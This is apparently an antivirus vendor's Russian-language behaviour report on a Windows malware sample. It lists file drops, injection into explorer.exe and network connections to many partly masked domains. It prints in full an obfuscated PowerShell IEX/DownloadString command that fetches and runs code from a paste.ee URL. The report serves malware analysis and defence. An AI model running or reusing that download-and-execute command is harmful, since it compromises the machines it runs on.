Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://si###ongroup.ru/wp-admin/bin.exe как %temp%\qmbrki.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://paste.ee/r/r87uc')
Внедряет код в
следующие системные процессы:
- %WINDIR%\explorer.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\qmbrki.exe
Удаляет следующие файлы
- %TEMP%\qmbrki.exe
Сетевая активность
Подключается к
- 'pa##e.ee':80
- 'pa##e.ee':443
- 'si###ongroup.ru':80
- 'mi###agon.com':80
- 'st#####dketamine.com':80
- 'an#####iamatkovskia.com':80
- 'si###ytomas.com':80
- 'ab###club.com':80
- 'sa####magazine.com':80
- 'dm###arch.com':80
TCP
- 'pa##e.ee':443
UDP
- DNS ASK pa##e.ee
- DNS ASK si###ongroup.ru
- DNS ASK mi###agon.com
- DNS ASK st#####dketamine.com
- DNS ASK gr###vikov.info
- DNS ASK an#####iamatkovskia.com
- DNS ASK si###ytomas.com
- DNS ASK ab###club.com
- DNS ASK xh##021.com
- DNS ASK ko####ieitai.info
- DNS ASK sa####magazine.com
- DNS ASK av####sorsinc.com
- DNS ASK dm###arch.com
Другое
Создает и запускает на исполнение
- '%TEMP%\qmbrki.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://paste.ee/r/r87uc')' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\wuapp.exe'
- '%WINDIR%\syswow64\cmd.exe' del "%TEMP%\qMBRkI.exe"
